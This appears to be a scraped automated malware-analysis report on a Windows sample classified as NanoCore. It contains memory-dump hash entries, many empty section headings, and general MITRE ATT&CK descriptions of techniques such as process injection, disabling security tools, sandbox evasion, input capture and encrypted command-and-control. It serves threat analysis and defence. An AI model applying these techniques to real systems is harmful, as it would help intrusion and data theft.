Memory Dump Source

Source File: 0000000D.00000002.485650987.00000000075E0000.00000040.00000001.sdmp, Offset: 075E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 549552f13fbed4741847683a979d2326d28a199db17a9702ac9cc35a3cbf1104
Instruction ID: 86f99281fbb53399817360ec67fa18a7b476e8a8bc652c2cf5c98a3f6727db7f
Opcode Fuzzy Hash: 549552f13fbed4741847683a979d2326d28a199db17a9702ac9cc35a3cbf1104
Instruction Fuzzy Hash: CAE0E5B0C0020EEECB44EFA8C4542DEBBF0BB04604F20C96AC029EA301E7B442568F92

Uniqueness

Uniqueness Score: -1.00%

Function 075E1410, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.485650987.00000000075E0000.00000040.00000001.sdmp, Offset: 075E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 118cef99279a92a6cf21b4e237e6b6f3e045498809bc214ab8963a4eafcff654
Instruction ID: db34be83134fb499e5dcc2cfbe45bdd829545d8b34b47662705923c332500649
Opcode Fuzzy Hash: 118cef99279a92a6cf21b4e237e6b6f3e045498809bc214ab8963a4eafcff654
Instruction Fuzzy Hash: 87E0ECB0D4020EDEC780EFA8C40179EBBF4BB04204F208969C015E6341F7B456468F91

Uniqueness

Uniqueness Score: -1.00%

Function 075E13E0, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.485650987.00000000075E0000.00000040.00000001.sdmp, Offset: 075E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2111a779d4e11e695d0813f963ed6f9b9deeba0fa85dd2c416c91792f94cfc48
Instruction ID: 6b8122bf33b558844429c6ac662e65b10cd42dda99089aeb92a238e34c857aa7
Opcode Fuzzy Hash: 2111a779d4e11e695d0813f963ed6f9b9deeba0fa85dd2c416c91792f94cfc48
Instruction Fuzzy Hash: 30C08C7123831CD3CB2CD6566888AF7336FB3CCB00F08CA62B00B2268C8EB2A8000244

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report ZVFVY7NwZ7.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

AV Detection:

E-Banking Fraud:

System Summary:

Stealing of Sensitive Information:

Remote Access Functionality:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre